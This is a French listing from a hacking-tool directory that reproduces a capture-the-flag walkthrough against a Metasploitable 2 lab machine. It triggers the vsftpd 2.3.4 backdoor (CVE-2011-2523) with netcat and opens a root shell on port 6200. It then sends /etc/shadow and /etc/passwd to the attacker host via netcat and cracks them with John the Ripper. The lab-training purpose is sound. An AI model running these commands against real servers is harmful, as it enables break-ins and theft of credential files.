Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CTF---CVE-2011-2523 — Procédure pas à pas CTF exploitant la backdoor vsftpd 2.3.4 (CVE-2011-2523) pour capturer et craquer /etc/shadow et /etc/passwd de Metasploitable 2. | Kitploit
Outils/GitHubGitHub/xiangsi-howard/ctf---cve-2011-2523
Cassage de Mots de PasseReconnaissanceAnalyse des VulnérabilitésExploitationCollecte d'InformationsCTFTests d'IntrusionApprentissage et Éducation

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
GitHub
xiangsi-howard/ctf---cve-2011-2523

CTF---CVE-2011-2523

Procédure pas à pas CTF exploitant la backdoor vsftpd 2.3.4 (CVE-2011-2523) pour capturer et craquer /etc/shadow et /etc/passwd de Metasploitable 2.

Voir le dépôt
6il y a 3 ansPas encore vérifié

Scénario Capture the Flag - CVE-2011-2523

Capturez les fichiers /etc/shadow et /etc/passwd déchiffrés du serveur vulnérable Metasploitable 2.

Configuration de l'environnement

Étape 1 : Télécharger et décompresser la machine virtuelle

Pour ce CTF, nous utilisons VMware Workstation Pro avec deux machines virtuelles. Nous utilisons Kali Linux comme machine de l'attaquant et Metasploitable 2 comme machine vulnérable.

  • Téléchargez et installez VMware Workstation : https://www.vmware.com/products/workstation-player/workstation-player-evaluation.html
  • Téléchargez et extrayez la machine virtuelle Kali Linux : https://www.kali.org/get-kali/
  • Téléchargez et extrayez la machine virtuelle Metasploitable 2 : https://sourceforge.net/projects/metasploitable/files/Metasploitable2/

Étape 2 : Ouvrez Kali Linux et les machines virtuelles Metasploitable 2 dans VMware à partir du fichier extrait

  • Choisissez l'option Open a Virtual Machine dans VMware Workstation et sélectionnez le fichier Kali Linux décompressé
  • Faites un clic droit sur la barre de défilement et sélectionnez l'option open, puis sélectionnez le fichier Metasploitable 2 décompressé
  • Appuyez sur le bouton Play virtual machine sur les deux machines virtuelles
  • Lorsque vous êtes invité à sélectionner l'option I moved It ou I copied It, choisissez I copied It

Étape 3 : Connexion

  • Connectez-vous à Kali Linux en utilisant kali comme nom d'utilisateur et mot de passe
  • Connectez-vous à Metasploitable en utilisant msfadmin comme nom d'utilisateur et mot de passe

Étape 4 : Enregistrez l'adresse IP de la machine virtuelle Metasploitable

  • Exécutez ip addr show et enregistrez l'adresse IP de la section inet

Solution

Le Massachusetts Institute of Technology Research and Engineering détaille CVE-2011-2523 comme une vulnérabilité et exposition courante où vsftpd 2.3.4 téléchargé entre le 30 juin 2011 et le 3 juillet 2011 contient une porte dérobée qui ouvre un shell sur le port 6200/tcp.

Étape 1 : Recherchez les ports ouverts sur la machine Metasploitable à l'aide du service FTP

  • nmap <vulnerable-machine-ip-address>
  • Le scan nmap devrait montrer un port ouvert sur le port 21 utilisant le service ftp

Étape 2 : Essayez de vous connecter via NetCat au port ouvert

  • nc <vulnerable-machine-ip-address> 21
  • Le nom d'utilisateur est n'importe quelle chaîne avec :) à la fin, entrez user <chaîne>:)
  • Lorsque vous êtes invité à entrer un mot de passe, saisissez n'importe quelle chaîne pass <chaîne>
  • Puis quittez la connexion avec ^C [CTRL + C], un shell root sur Metasploitable a été ouvert sur le port 6200.

Étape 3 : Connectez-vous au shell sur le port 6200 de la machine vulnérable

  • nc -v <vulnerable-machine-ip-address> 6200
  • Affichez l'adresse IP de la connexion actuelle ip addr show
  • Montrez que l'accès root a été accordé avec whoami

Étape 4 : Copiez les fichiers /etc/shadow et /etc/passwd dans un autre fichier

  • cp /etc/shadow shadow.txt
  • cp /etc/passwd passwd.txt

Étape 5 : Envoyez les fichiers copiés vers la machine Kali Linux via NetCat

  • Sur la machine attaquante, recherchez l'adresse IP sous inet à l'aide de la commande ip addr show
  • Écoutez les fichiers avec nc -l -p 1234 > shadow.txt sur la machine attaquante
  • Dans le shell root sur Metasploitable, exécutez nc -w 3 <destination-ip> 1234 < shadow.txt
  • Répétez pour le fichier passwd

Étape 5 : Formatez le fichier shadow au format de l'outil John

  • unshadow passwd.txt shadow.txt > unshadowed-input
  • Observez le fichier avec cat unshadowed-input, il devrait contenir le nom d'utilisateur et le mot de passe

Étape 6 : Déchiffrez le fichier shadow à l'aide de la commande John et d'une liste de mots

  • Utilisez la liste de mots rockyou.txt pour casser les hachages avec john
  • Décompressez le fichier de liste de mots sur Kali Linux avec sudo gzip -d /usr/share/wordlists/rockyou.txt.gz
  • Lorsque vous êtes invité à entrer un mot de passe, utilisez le mot de passe administrateur par défaut de Kali Linux kali
  • Déhachez les mots de passe avec john unshadowed-input –wordlist=/usr/share/wordlists/rockyou.txt
  • Visualisez les mots de passe cassés john –show unshadowed-input
Télécharger l’outil